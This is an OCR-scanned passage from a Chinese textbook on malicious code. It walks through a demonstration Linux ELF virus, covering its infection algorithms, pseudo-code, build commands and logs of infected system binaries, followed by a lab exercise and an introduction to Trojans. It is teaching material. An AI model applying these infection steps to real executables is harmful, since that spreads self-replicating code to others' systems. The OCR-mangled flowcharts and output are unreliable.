offset 加 上 原来 的 p_filesz 的 偏 移 位 置 。 

第 二 种 算法 是 数据 段 后 填充 病毒 感染 ,具体 步骤 如 下 。 

(1) 修改 病毒 代码 ,使 病毒 代码 执行 后 能 够 跳 转 到 原来 的 入口 点 。 

(2) 定位 数据 段 : 修改 ELF 头 中 的 入 口 点 ,指向 新 的 代码 , 即 数据 段 末 尾 处 (p_vaddr 十 
p_memsz); 修改 e_shoff 字段 指向 新 的 节 头 表 偏 移 量 , 即 原来 的 加 上 加 入 的 病毒 大 小 和 bss 
段 大 小 。 

(3) 对 于 数据 段 程序 头 : 增加 p_filesz 用 来 包括 新 的 代码 和 . bss 节 ; 增加 p_memsz 包 
含 新 的 代码 ; 计算 . bss 节 的 大 小 (p_memsz-p_filesz) 。 

(4) 对 于 任何 一 个 插入 点 之 后 节 的 节 头 shdr: 增加 sh_offset, 增 加 数值 为 病毒 大 小 与 . 
bss 节 大 小 的 和 。 

(5) 物理 地 插入 病毒 代码 到 文件 中 : 移动 节 头 表 以 及 其 他 两 个 不 属于 任何 段 的 节 。 

目标 选择 算法 很 简单 ,就 是 读 取 当前 目录 ,然后 读 取 第 一 个 未 被 感染 的 可 执行 ELF 文 
件 来 感染 ,没有 用 到 随机 算法 ,这 将 是 本 病毒 未 来 的 扩展 。 

感染 方法 选择 算法 也 是 很 简单 的 ,在 感染 器 执行 中 ,对 第 一 个 宿主 进行 感染 可 以 进 
行 手工 选择 ,在 病毒 体 执行 过 程 中 ,目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,首先 优先 
使 用 文本 段 之 后 填充 区 感染 的 方法 ,如 果 填 充 区 比 病毒 的 体 


积 小 , 则 自动 切换 到 使 用 数据 段 之 后 填充 病毒 的 方法 。 可 以 
在 以 后 的 设计 中 增加 一 个 随机 画 数 来 随机 确定 使 用 哪 一 种 
方法 进行 感染 ,这 样 更 能 提高 病毒 的 隐蔽 性 和 查 杀 病 毒 的 1 
程序 头 表 处 
难度 。 理 模块 
3. 流程 图 1 
这 里 只 介绍 病毒 体 程序 的 流程 图 ,感染 器 程序 流程 图 与 病 二 
毒 体 流程 图 类 似 ,只 是 可 以 自 定义 感染 方法 而 已 ,在 此 不 做 的 
介绍 。 1 
病毒 体 程序 实现 可 以 分 为 4 个 模块 ,分 别 为 初始 化 模块 、 收尾 模块 


程序 头 表 处 理 模块 \ 节 头 表 处 理 模 块 以 及 收尾 模块 ,如 图 4-3 一 
图 4-6 所 示 。 图 4-3 ”病毒 体 流程 图 
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读 取 当前 目录 
下 的 合适 文件 


1 
读 取 内 存 映 
像 中 的 病毒 
体 代码 


图 4-4 


读 取 插入 点 之 后 
Data 数 


写 入 填充 至 
PAGESIZE 大 小 的 
病毒 体 


将 Data 数 组 内 容 
写 回 文件 


恢复 寄存 器 


写 入 bss 大 小 的 
填充 


贡 


判定 使 用 数 
据 段 感染 


根据 文本 段 感染 
修改 相关 字段 


初始 模块 和 收尾 模块 流程 图 
根据 数据 段 感染 读 取 文件 头 表 
修改 相关 字段 表 项 


息 否 文本 让 


之 后 感染 修正 p_offset 


将 ELF 头 和 程序 
头 表 写 回 文件 


4-5 程序 头 表 处 理 模块 流程 图 
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读 取 节 头 表 表 项 | 


sh_offset 增 加 
VIRUSSIZE+ 
bss_size 


sh_offset 增 加 
PAGESIZE 修 
订 文 本 段 size 


否 
1 


sh_offset 增 加 
PAGESIZE 


将 节 头 表 内 容 写 回 
交 件 


图 4-6 节 头 表 处 理 模块 流程 图 


4. 实现 过 程 的 伪 代 码 说 明 


void virus(void) 
由 
__asm _ volatile (保存 寄存 器 信息 , 即 保存 除去 esp 以 外 其 他 7 个 通用 寄存 器 ); 
打开 当前 目录 ". ", 准 备 读 取 当 前 目录 下 文件 信息 
_asm_ _ volatile (获取 病毒 体 的 起 始 虚拟 地 址 ); 
读 取 当 前 目录 第 一 个 文件 
while( 循 环 检查 当前 文件 是 否 为 未 被 感染 的 可 执行 ELF 文件 ) 


证 (是 ) break; 
else 
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读 取 下 一 个 文件 信息 
: 
< 病毒 体 演 示 打 印 的 内 容 > 
读 取 文件 ELF 头 
char Virus[ PAGESIZE]; 
利用 memcpy 获得 病毒 , 存 人 数组 Virus 中 
修订 病毒 体 使 其 能 够 跳 转 到 原来 的 入 口 点 
处 理 程序 头 表 
for( 循 环 读 取 程序 头 表 中 表 项 ) 
{ 
证 (如 果 为 文本 段 之 后 的 段 并 且 使 用 文本 段 后 填充 方法 感染 ) 
{ 
p_offset 增 大 PAGESIZE 大 小 ; 
} 
else if( 类 型 为 PT_LOAD) 
{ 
if( 是 数据 段 且 使 用 数据 段 之 后 插入 方法 感染 ) 
{ 


根据 该 感染 算法 修改 ELF 头 以 及 数据 段 程序 头 中 的 各 种 相关 信息 
“本 证 (为 文本 段 ) 
if (病毒 体 太 大 了 超过 可 填充 大 小 ) 
使 用 数据 段 感染 方法 


else 


使 用 文本 段 后 填充 感染 方法 
根据 该 感染 算法 修改 ELF 头 以 及 文本 段 程序 头 中 的 各 种 相关 信息 
} 
} 


] 
读 取 下 一 个 段 的 程序 头 


| 
分 别 将 ELF 头 和 程序 头 表 写 回 文件 
处 理 节 头 表 
for( 循 环 读 取 节 头 表 中 表 项 ) 
{ 
证 (插入 点 之 后 各 节 ) 
{ 
证 (使 用 数据 段 感染 ) 
{ 
sh_offset 增 大 (VIRUS_SIZE + bss_size); 
} 
else if( 使 用 文本 段 填充 感染 ) 
{ 
if( 文 本 段 最 后 一 节 ) 
{ 
修订 该 节 头 字段 sh_size 
} 
else 
sh_offset 增 大 PAGESIZE 大 小 ; 
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} 
} 
读 取 下 一 个 节 头 表 项 ; 


l 

节 头 表 写 回 文件 

获取 文件 大 小 

读 取 插入 点 之 后 内 容 到 Data 数组 中 
(使 用 数据 段 感染 方法 ) 


写 人 .bss 大 小 的 填充 ,然后 写 人 病毒 体 


else 
写 人 病毒 体 并 填充 至 PAGESIZE 大 小 


有 

将 Data 数组 内 容 写 回 文件 

out:_asm_ _ volatile (恢复 寄存 器 内 容 并 设置 跳 转 指令 ) 
void virus_end(void){virus();} 


标志 病毒 体 结束 的 函数 , 用 来 修复 VIRUS_SIZE 宏 定义 


5. 感染 过 程 实例 
完成 了 所 有 编程 工作 后 就 需要 对 病毒 体 进行 实例 测试 了 ,看 是 否 完成 预期 的 目标 。 


在 一 个 新 的 环境 中 ,编译 病毒 体 的 过 程 是 很 简单 的 ,基本 上 需要 修订 的 工作 都 由 bash 


脚本 完成 。 
在 病毒 体 源码 所 在 工作 目录 下 ,编译 过 程 如 下 。 
(1) 执行 命令 make all 。 
(2) 执行 命令 chmod a 十 x . /get_patch. sh 。 
(3) 执行 命令 . /get_patch. sh。 
(4) 执行 命令 make clean && make all。 


上 述 一 系列 命令 都 被 写 入 脚本 install. sh, 所 以 可 以 选择 执行 . /install. sh 就 可 以 得 到 
含有 病毒 体 的 感染 器 ELF 可 执行 文件 infect。 关 于 get_patch. sh 脚本 中 完成 的 工作 主要 是 
对 两 个 宏 定 义 进行 修订 ,因为 不 同 的 环境 不 同 的 编译 器 会 导致 这 两 个 宏 定义 不 同 ,所 以 需要 
每 次 单独 修订 ,然后 再 重新 编译 。 这 个 脚本 中 的 内 容 可 以 参考 上 一 节 技 术 汇 总 中 的 内 容 。 


编译 过 程 如 下 。 


[root@project homework]# make all 

gcc Virus.c -c -fomit-frame-pointer -Wall -oO Virus.o 

Virus.c; In function 然 irus?p 

Virus.c:95: warning: passing argument 2 of 鲜 rite?makes pointer from integer without a cast:t 
gcc infector.c Virus.o -0 infect -Wall 

[root@project homework]# ./get_patch.sh 

VIRUS_SIZE= 2895 

JMP_OFFSET= 2336 

[root@project homework]# make clean 

rm -f virus.o infect 

[root@project homework]# make all 

gcc virus.c -c -fomit-frame-pointer -Wall -o Virus.o 

Virus.c: In function 然 irus?p 

virus.c:95: warning: passing argument 2 of 鲜 rite?makes pointer from integer without a cast:t 
gcc infector.c Virus.o -o infect -Wall 

[root@proiect homework]# 
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测试 过 程 : 由 于 本 病毒 并 没有 什么 实际 危害 ,只 是 一 个 演示 版 本 ,因此 感染 后 的 宿 3 
现 为 在 打印 自身 的 输出 结果 前 先 打印 E、L.F 这 3 个 字母 。 

宿主 文件 病毒 首先 使 用 infect 进行 感染 ,复制 /bin/df 到 当前 的 目录 ,并 进行 两 个 复制 ， 
分 别 复制 为 textl 和 datal 两 个 文件 ,分别 进行 对 文本 段 填充 感染 和 数据 段 后 感染 。 


[root@project homework]# cp /bin/df ./ 
[root@project homework]# ./df 
Filesystem 1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVo100 

4412028 1771504 2412788 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@project homework]# ./infect df 
Usage : infect <ELF filename> [OPTION] 
OPTIONS: --text : Insert virus code to text segment padding. 

--data : Insert virus code after data segment. 

[root@project homework]# cp df textI 
[root@project homework]# cp df datal 
[root@project homework]# ./infect textl --text 
[root@project homework]# ./infect datal --data 
[root@project homework]# ./textl 
ELFFilesystem 1K-blocks Used Available Use% Mounted on 
/dev/mapper/VolGroup00-LogVo100 

4412028 1771596 2412696 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@project homework]# 
[root@project homework]# ./datal 
ELFFilesystem 1K-blocks Used Available Use% Mounted on 
/dev/mapper/VolGroup00-Logvo100 

4412028 1771596 2412696 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@proiject homework]# 


可 以 发 现 两 个 文件 textl 和 datal 都 已 经 被 成 功 感染 。 注 意 当 执行 这 两 个 被 感染 文件 
时 ,当前 目录 将 会 有 文件 被 感染 。 有 可 能 是 文件 textl, 要 视 当 前 目录 内 可 执行 文件 名 称 
而 定 。 

创建 测试 目录 testl ,并 向 testl 目录 中 复制 /bin/df, 以 及 textl 文件 ,执行 textl, 并 观 


察 df 是 否 被 文本 段 填充 方式 感染 。 


[root@project homework]# mkdir testl 
[root@project homework]# cp /bin/df test1/ 
[root@project homework]# cp textl testl/test 
[root@project homework]# cd test1/ 
[root@project test1l]# 11 
total 100 
—rIWXr-Xxr-x 1 root root 41476 May 9 21:22 df 
—rWXr-xr-x 1 root root 45572 May 9 21:22 test 
[root@project test1]# ./test 
ELFFilesystem 1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVo100 
4412028 1771548 2412744 43% / 


/dev/sdal 101086 10894 84973 12% /boot 

tmpfs 48472 0 48472 0% /dev/shm 
[root@project test1]# ./df 

ELFFilesystem 1K-blocks Used Available Uses Mounted on 


/dev/mapper/VolGroup00-LogVol100 

4412028 1771548 2412744 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 


发 现 df 已 经 被 感染 ,对 比 df 感染 前 后 的 数据 段 信息 ,可 以 发 现 数据 段 的 偏 移 量 增 大 了 
0x1000 大 小 ,说 明 感 染 方法 是 文本 段 后 填充 感染 。 
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[root@project test1]# readelf -1 /bin/df 1grep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0x0992c 0x0992c R E 0x1000 
LOAD 0x00992c 0x0805292c 0x0805292c 0x0037c 0x004fc RW 0x1000 
[root@project test1]# 
[root@project test1]# readelf -1 ./df lgrep LOAD 
LOAD 0x000000 0x08048000 0x08048000 0x0a47b 0x0a47b R E 0x1000 
LOAD 0x00a92c 0x0805292c 0x0805292c 0x0037c Ox004fc RW 0x1000 
[root@proiject test1]# 


创建 测试 目录 test2, 并 向 test2 目录 中 复制 /bin/ls, 以 及 datal 文件 ,执行 datal ,并 观 
察 由 于 文本 段 后 填充 不 足 ,包含 病毒 体 的 ls 文件 是 否 被 数据 段 后 感染 方式 感染 。 


[root@project homework]# mkdir test2 
[root@project homework]# cp /bin/ls ./test2/ 
[root@project homework]# cp datal ./test2/test 
[root@project homework]# cd test2 
[root@project test2]# 11 
total 144 
-LIWXL-XL-X 1 root root 89464 May 9 22:34 1s 
—IWXI-Xr-X 1 root root 44755 May 9 22:34 test 
[root@project test2]# 
[root@project test2]# ./test 
ELFFilesystem 1K-blocks Used Available Uses Mounted on 
/dev/mapper/VolGroup00-LogVo100 
4412028 1771696 2412596 43% / 
/dev/sdal 101086 10894 84973 12% /boot 
tmpfs 48472 0 48472 0% /dev/shm 
[root@project test2]# 
[root@project test2]# ./1s 
ELFls test 


说 明 ls 已 经 被 感染 了 ,对 比 1s 文件 感染 前 后 数据 段 和 文本 段 信息 ,发 现 数据 段 偏 移 并 


没有 改变 ,只 是 数据 段 的 大 小 改变 了 ,所 以 说 明 是 数据 段 后 填充 方法 进行 


[root@project test2]# 
[root@project test2]# readelf -1 /bin/ls 1grep LORD 
LOAD 0x000000 0x08048000 0x08048000 0xl4ef4 Oxl4ef4 R E Ox1000 
LOAD 0x015000 0x0805d000 0x0805d000 0x0081c 0x00c50 RW Ox1000 
[root@project test2]# 
[root@project test2]# readelf -1 ./1ls 1grep LORD 
LOAD 0x000000 0x08048000 0x08048000 0xl4ef4 0xl4ef4 R E 0x1000 
LOAD 0x015000 0x0805d000 0x0805d000 0x0179f 0x0179f RW 0x1000 
[root@project test2]# 


4.7 综合 实验 
综合 实验 三 , Linux ELF 病毒 实验 


【实验 目的 】 

(1) 了 解 Linux 感染 ELF 可 执行 文件 的 病毒 的 基本 编制 原理 。 
(2) 了 解 可 执行 文件 病毒 的 感染 、 破 坏 机 制 。 

【实验 环境 】 

Red Hat Linux 操作 系统 。 

【实验 步 又】 


的 感染 。 


文件 位 置 : 本 书 配 套 素材 目录 \Experiment\LinuxELF。 该 目录 下 共 包 含 如 下 文件 。 


get_patch. sh: 用 来 修订 文件 中 两 个 宏 定 义 的 bash 脚本 文件 。 
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infector. c: 感染 器 程序 。 

infector. h: 感染 器 程序 的 头 文件 。 

Makefile: Makefile 文件 。 

virus. c: 病毒 体 的 源 文件 。 

virus. h: 病毒 体 头 文件 。 

(1) 复制 这 些 文件 到 Linux 系统 。 

(2) 修改 脚本 的 执行 属性 。 

(3) 创建 测试 用 可 执行 程序 ,根据 病毒 感染 能 力 , 注 意 测试 文件 的 属性 、 所 在 目录 层 
(4) 参考 4.5 节 学 习 病 毒 原理 ,并 执行 病毒 ,观察 感染 过 程 。 

【实验 注意 事项 】 

(1) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 本 病毒 程序 具有 一 定 的 破坏 力 ,做 实验 时 注意 安全 ,推荐 使 用 虚拟 机 环境 。 


4.8 习 题 


一 、 填空 题 
1. Linux 可 执行 文件 的 前 4 个 字符 保存 一 个 魔术 数 (magic number) ,用 来 确定 该 文件 
是 否 为 的 目标 文件 。 
2. Linux 脚本 型 恶意 代码 的 核心 语句 (实现 自我 复制 的 语句 ) 是 ; 
二 、 选择 题 
1. 第 一 个 跨 Windows 和 Linux 平 台 的 病毒 是 ( 。 “)。 
A. Lion B. W32. Winux 
C. Bliss D. Staog 
2. Linux 系统 下 的 欺骗 库 函 数 病毒 使 用 了 Linux 系统 下 的 环境 变量 ,该 环境 变量 
是 ( ) 


A. GOT B LDLOAD 
C. PLT D. LD_PRELOAD 
、 思 考题 


1. Linux 下 病毒 相对 较 少 ,这 是 由 什么 原因 造成 的 ? 请 分 别 从 技术 角度 和 非 技术 角度 
探讨 。 

2. 简单 概括 Linux 下 病毒 的 种 类 。 

3. 简单 描述 感染 Linux ELF 格式 可 执行 文件 文本 段 的 主要 步骤 。 

四 、 实 操 题 

1. 在 虚拟 机 上 安装 RedHat Linux 操作 系统 。 

2. 掌握 并 实践 Linux 操作 系统 下 的 Shell 恶意 脚本 。 

3. 学 习 并 运行 感染 ELF 格式 可 执行 文件 的 原理 型 病毒 。 
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古 希 腊 士 兵 藏 在 高 大 的 木马 中 潜入 特洛伊 城 , 采 用 里 应 外 合 的 战术 一 举 占 领 了 特洛伊 
城 。 现 在 所 讲 的 特洛伊 木马 侵入 远程 主机 的 方式 在 战术 上 与 古 希 腊 士兵 的 攻 城 方式 相同 。 
通过 这 样 的 解释 相信 大 多 数 读 者 对 木马 入 侵 主 机 的 方式 有 所 领悟 : 它 就 是 通过 某 些 手段 潜 
入 对 方 的 计算 机 系统 ,并 以 种 种 隐蔽 方式 藏匿 在 系统 中 ; 系统 启动 时 ,木马 自动 在 后 台 隐 项 
运行 ; 最 终 , 这 种 程序 以 “里 应 外 合 ” 的 工作 方式 ,达到 控制 对 方 计算 机 、 窃 取 关 键 信 息 等 
目的 。 

特洛伊 木马 和 传统 病毒 的 最 大 区 别 是 表现 欲望 不 强 ,通常 只 采取 窃取 的 手段 获取 信息 ， 
因此 ,受害 者 很 难 发 现 特洛伊 木马 的 踪迹 。 即 使 在 反 病 毒 软 件 日 益 强 大 的 今天 ,特洛伊 木马 
仍 是 非常 大 的 安全 隐患 。 绝 大 多 数 人 不 知道 木马 为 何 物 ,会 给 他 们 带 来 多 大 的 危害 ,所 以 他 
们 迄今 仍 不 停 地 从 不 可 信 的 站 点 下 载 可 能 拥 绑 了 木马 的 文件 。 

本 章 将 介绍 木马 的 一 些 特征 .木马 入 侵 的 一 些 常用 技术 ,以 及 防范 和 清除 方法 。 在 本 章 
的 最 后 ,还 对 几 款 常见 木马 程序 的 防范 经 验 作 了 较为 详细 的 说 明 。 

本 章 学 习 目标 

(1) 掌握 特洛伊 木马 的 概念 。 

(2) 掌握 木马 开发 实例 。 

(3) 掌握 木马 的 工作 流程 和 关键 技术 。 

(4) 掌握 木马 防范 方法 。 


5.1 基本 概念 


5.1.1 木马 概述 


木马 的 全 称 是 “特洛伊 木马 ”(Trojan Horse) ,得 名 于 原 荷 马 史诗 (伊利 亚 特 ) 中 的 战争 
手段 。 在 网 络 安全 领域 中 ,“ 特 洛 伊 木马 ”是 一 种 与 远程 计算 机 之 间 建 立 起 连接 ,使 远程 计算 
机 能 够 通过 网 络 控制 用 户 计算 机 系统 并 且 可 能 造成 用 户 的 信息 损失 、 系 统 损 坏 甚 至 瘫痪 的 
程序 。 

一 个 完整 的 木马 系统 由 硬件 部 分 .软件 部 分 和 具体 连接 部 分 组 成 。 

(1) 硬件 部 分 。 建 立木 马 连 接 所 必需 的 硬件 实体 。 

中 控制 端 : 对 服务 端 进行 远程 控制 的 一 方 。 

@ 服务 端 : 被 控制 端 远程 控制 的 一 方 。 

@ Internet: 控制 端 对 服务 端 进行 远程 控制 ,数据 传输 的 网 络 载体 。 

(2) 软件 部 分 。 实 现 远程 控制 所 必需 的 软件 程序 。 

Q@ 控制 端 程序 : 控制 端 用 以 远程 控制 服务 端的 程序 。 

加 木马 程序 : 潜入 服务 端 内 部 ,获取 其 操作 权限 的 程序 。 


第 5 章 特洛伊 木马 I23 


@ 木马 配置 程序 : 设置 木马 程序 的 端口 号 、 触 发 条 件 、 木 马 名 称 等 ,并 使 其 在 服务 端 藏 
得 更 隐蔽 的 程序 。 

(3) 具体 连接 部 分 。 通 过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 
元 素 。 
Q@ 控制 端 IP 和 服务 端 IP: 即 控制 端 和 服务 端的 网 络 地 址 ,也 是 木马 进行 数据 传输 的 
目的 地 。 

@ 控制 端 端口 和 木马 端口 : 即 控制 端 和 服务 端的 数据 入 口 ,通过 这 个 入 口 ,数据 可 直 
达 控 制 端 程序 或 木马 程序 。 

木马 是 恶意 代码 的 一 种 ,Back Orifice(BO)、Netspy、Picture、Netbus、Asylum 以 及 冰 
河 \ 灰 铅 子 等 这 些 都 属于 木马 种 类 。 综 合 现在 流行 的 木马 程序 ,它们 都 有 以 下 基本 特征 。 

1. 欺骗 性 

为 了 诱惑 攻击 目标 运行 木马 程序 ,并 且 达 到 长 期 隐藏 在 被 控制 者 机 器 中 的 目的 ,特洛伊 
木马 采取 了 很 多 欺骗 手段 。 木 马 经 常 使 用 类 似 于 常见 的 文件 名 或 扩展 名 (如 dll、win、sys、 
explorer) 的 名 称 , 或 者 仿制 一 些 不 易 被 人 区 别 的 文件 名 (如 字母 “1” 与 数字 “1”、 字 母 “0” 与 数 
字 “0”)。 它 通常 修改 系统 文件 中 的 这 些 难 以 分 辨 的 字符 ,更 有 其 者 干脆 就 借用 系统 文件 中 
已 有 的 文件 名 ,只 不 过 保存 在 不 同 的 路 径 之 中 。 

还 有 的 木马 程序 为 了 欺骗 用 户 , 常 把 自己 设置 成 一 个 ZIP 文件 式 图 标 , 当 用 户 一 不 小 心 
打开 它 时 , 它 就 马上 运行 。 以 上 这 些 手 段 是 木马 程序 经 常 采用 的 ,当然 ,木马 程序 编制 者 也 
在 不 断 地 研究 .发掘 新 的 方法 。 总 之 ,木马 程序 是 越 来 越 隐蔽 , 越 来 越 专业 ,所 以 有 人 称 木马 
程序 为 “骗子 程序 ”。 

2. 隐蔽 性 

很 多 人 分 不 清 木 马 和 远程 控制 软件 ,木马 程序 是 驻 留 目标 计算 机 后 通过 远程 控制 功能 
控制 目标 计算 机 。 实 际 上 它们 两 者 的 最 大 区 别 就 在 于 是 否 隐蔽 起 来 。 例 如 ,PC Anywhere 
在 服务 器 端 运行 时 ,客户 端 与 服务 器 端 连 接 成 功 后 客户 端 机 上 会 出 现 很 醒目 的 提示 标志 。 
而 木马 类 软件 的 服务 器 端 在 运行 的 时 候 应 用 各 种 手段 隐藏 自己 ,不 可 能 出 现 什 么 提示 ,这 些 
黑客 们 早 就 想到 了 方方面面 可 能 发 生 的 迹象 ,把 它们 隐藏 。 木 马 的 隐蔽 性 主要 体现 在 以 下 
两 个 方面 。 

(1) 木马 程序 不 产生 图 标 。 它 虽然 在 系统 启动 时 会 自动 运行 ,但 它 不 会 在 “任务 栏 ”中 
产生 一 个 图 标 ,防止 被 发 现 。 

(2) 木马 程序 不 出 现在 任务 管理 器 中 。 它 自动 在 任务 管理 器 中 隐藏 ,并 以 “系统 服务 ” 
的 方式 欺骗 操作 系统 。 

3. 自动 运行 性 

木马 程序 是 一 个 系统 启动 时 即 自动 运行 的 程序 ,所 以 它 可 能 潜入 在 启动 配置 文件 (如 
win. ini、system. ini、winstart. bat 等 ) 启动 组 或 注册 表 中 。 

4、 自 动 恢复 功能 

现在 很 多 木马 程序 中 的 功能 模块 已 不 再 由 单一 的 文件 组 成 ,而 是 将 文件 分 别 存 储 在 不 
同 的 位 置 。 最 重要 的 是 ,这 些 分 散 的 文件 可 以 相互 恢复 ,以 提高 存活 能 力 。 


124 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


5. 功能 的 特殊 性 

一 般 来 说 ,木马 的 功能 都 是 十 分 特殊 的 ,除了 普通 的 文件 操作 以 外 ,还 有 些 木 马 具 有 搜 
索 缓 存 中 的 口令 .设置 口令 .扫描 目标 计算 机 的 IP 地 址 、 进 行 键盘 记录 、 远 程 注册 表 的 操作 
以 及 锁定 鼠标 等 功能 。 


5.1.2 木马 的 分 类 


根据 木马 程序 对 计算 机 的 具体 控制 和 操作 方式 ,可 以 把 现 有 的 木马 程序 分 为 以 下 几 类 。 

1. 远程 控制 型 木马 

远程 控制 型 木马 是 现在 最 流行 的 森马。 每 个 人 都 想 有 这 样 的 木马 ,因为 它们 可 以 使 控 
制 者 方便 地 想 访 问 受害 人 的 硬盘 。 远 程控 制 木马 可 以 使 远程 控制 者 在 宿主 计算 机 上 做 任意 
的 事情 。 这 种 类 型 的 木马 有 著名 的 BO 和 “冰河 "等 。 

2. 发 送 密 码 型 木马 

发 送 密 码 型 木马 的 目的 是 为 了 得 到 缓存 的 密码 ,然后 将 它们 送 到 特定 的 E-mail 地 址 。 
这 种 木马 的 绝 大 多 数 在 Windows 每 次 加 载 时 自动 加 载 ,使 用 25 号 端口 发 送 邮 件 。 也 有 一 
些 木 马 发 送 其 他 的 信息 ,如 ICQ 相关 信息 等 。 如 果 用 户 有 任何 密码 缓存 在 计算 机 的 某 些 地 
方 ,这 些 木 马 将 会 对 用 户 造成 威胁 。 

3. 键盘 记录 型 木马 

键盘 记录 型 木马 的 动作 非常 简单 ,它们 唯一 做 的 事情 就 是 记录 受害 人 在 键盘 上 的 项 击 ， 
然后 在 日 志文 件 中 检查 密码 。 在 大 多 数 情 况 下 ,这 些 木 马 在 Windows 每 次 重启 的 时 候 加 
载 ,它们 有 "在线" 和 “下 线 ” 两 种 选项 。 当 用 “在 线 ” 选 项 的 时 候 , 它 们 知道 受害 人 在 线 , 会 记 
录 每 一 件 事情 。 当 用 "下 线 ? 选 项 的 时 候 ,受害 人 做 的 每 一 件 事情 会 被 记录 并 保存 在 受害 人 
的 硬盘 中 等 待 传送 。 

4. 毁坏 型 木马 

毁坏 型 木马 的 唯一 功能 是 毁坏 和 删除 文件 ,使 得 它们 非常 简单 易 用 。 它 们 能 自动 删除 
计算 机 上 所 有 的 DLL EXE 以 及 INI 文 件 。 这 是 一 种 非常 危险 的 木马 ,一 旦 被 感染 ,如 果 文 
件 没有 备份 , 毫 无 疑问 ,计算 机 上 的 某 些 信息 将 永远 不 复 存在 。 

5. FTP 型 木马 

FTP 型 木马 在 计算 机 系统 中 打开 21 号 端口 ,让 任何 有 FTP 客户 软件 的 人 都 可 以 在 不 
用 密码 的 情况 下 连 上 别人 的 计算 机 并 自由 上 传 和 下 载 。 


5.1.3 ”远程 控制 .木马 与 病毒 


远程 控制 软件 可 以 为 网 络 管理 做 很 多 工作 ,以 保证 网 络 和 计算 机 操作 系统 的 安全 。 这 
类 程序 的 监听 功能 也 是 为 了 保证 网 络 的 安全 而 设计 的 。 木 马 在 技术 上 和 远程 控制 软件 基本 
相似 。 它 们 最 大 的 区 别 就 是 木马 具有 隐藏 性 而 远程 控制 软件 没有 。 例 如 ,国内 的 血 蜘蛛 , 国 
外 的 PC Anywhere 等 都 是 远程 控制 软件 ,这 些 软件 的 服务 器 端 在 目标 计算 机 上 运行 时 , 目 
标 计算 机 上 会 出 现 很 醒目 的 标志 。 木 马 类 软件 的 服务 器 端 在 运行 的 时 候 应 用 各 种 手段 隐藏 
自己 。 
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从 计算 机 病毒 的 定义 和 特征 可 以 看 出 ,木马 程序 与 病毒 有 十 分 明显 的 区 别 。 最 基本 的 
区 别 就 在 于 病毒 有 很 强 的 传染 性 ,而 木马 程序 却 没有 。 木 马 不 能 自行 传播 ,而 是 依靠 宿主 以 
其 他 假象 来 冒充 一 个 正常 的 程序 。 由 于 技术 的 综合 利用 ,当前 的 病毒 和 木马 已 经 融合 在 一 
起 。 例 如 ,著名 的 木马 程序 YAI 由 于 其 中 采用 了 病毒 技术 , 差 一 点 就 成 了 第 二 个 CIH 病 
毒 。 反 过 来 ,计算 机 病毒 也 在 向 木马 程序 靠近 ,以 便 使 自己 具有 远程 控制 功能 。 例 如 ,“ 红 色 
代码 "病毒 已 经 具有 木马 的 远程 控制 功能 。 


5.1.4 木马 的 工作 流程 


木马 从 制造 出 来 ,到 形成 破坏 ,要 经 历 很 多 阶段 。 如 图 5-1 所 示 , 木 马 的 生命 流程 大 致 
为 : 木马 的 植 信 (中 木马 ) 阶 段 、 木 马 的 首次 运行 .木马 与 控制 端的 通道 建立 、 数 据 交 互 ( 木 马 
使 用 ) 阶 段 。 

(1) 木马 的 植 入 阶段 : 该 阶段 的 主要 工作 是 设法 把 木马 放置 在 目标 机 器 上 ,来 实现 对 
目标 机 器 的 控制 。 由 于 该 阶段 很 像 把 木马 这 粒 种 子 撤 向 目标 机 群 ,因此 被 形象 地 称 为 “ 植 
入 ”。 如 图 5-1(a) 所 示 , 编 制 好 的 木马 可 以 通过 E-mail、IM(QQ、 微 信 )、 网 络 服务 (Web、 
FTP、BBS 等 ) .恶意 代码 (Worm、Virus 等 ) .存储 介质 (磁盘 或 U 盘 ) 等 手段 ,经 过 互联 网 植 
人 到 受害 主机 上 。 


(1) E-mail 

OIM E | 标 (1) E-mail 
| 名 网 | OE 名。 | 
了 或 市 

人 恶意 代 码 刺 叶 | G) 其 他 网络 通知 。 | 中 

(9) 存储 介质 0 

(® 植 入 阶段 (b) 首次 握手 
目标 
主机 人 配置 参数 控 目标 命令 数据 控 
(Gs i 制 主机 | 一 。 | 制 
或 种 (2) 响应 参数 端 (木马 ) 市 
子 ) 

(0) 通道 配置 和 建立 (d) 使 用 阶段 


图 5-1 木马 的 工作 流程 


植 人 阶段 还 有 一 个 非常 重要 的 工作 就 是 木马 的 首次 运行 。 木 马 的 首次 运行 大 多 依靠 社 
会 工程 等 欺骗 手段 ,引诱 或 欺骗 用 户 触发 某 个 动作 。 经 过 首次 运行 后 ,木马 就 建立 起 了 自己 
的 启动 方式 。 

经 过 第 一 阶段 以 后 ,尽管 木马 在 目标 机 器 上 已 经 运行 起 来 ,但 控制 端 还 不 知道 木马 究竟 
在 哪 一 台 受 害 机 器 上 ,也 就 是 说 这 个 时 候 的 木马 还 处 于 自由 状态 。 

(2) 木马 的 首次 握手 : 如 图 5-1(b) 所 示 , 木 马 经 过 首次 握手 建立 与 控制 端的 联系 。 该 阶 
段 一 般 有 两 种 技术 : 一 种 是 木马 主动 和 控制 端 联系 (例如 ,木马 运行 后 可 以 主动 发 Email 给 控 
制 端 ); 另 一 种 是 控制 端 主动 和 木马 联系 (控制 端 通过 扫描 技术 去 发 现 运行 木马 的 目标 机 ) 。 

经 过 这 一 阶段 后 ,控制 端 建立 起 了 和 目标 机 的 联系 ,目标 机 就 处 于 被 监控 状态 。 
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(3) 建立 木马 信道 : 对 于 大 多 数 木马 来 说 ,前 期 植 人 到 目标 机 的 仅仅 是 一 个 种 子 或 木 
马 的 简单 版 本 。 通 道 建立 成 功 后 ,通过 配置 参数 或 下 载 插件 等 方式 扩充 木马 的 功能 ,使 其 成 
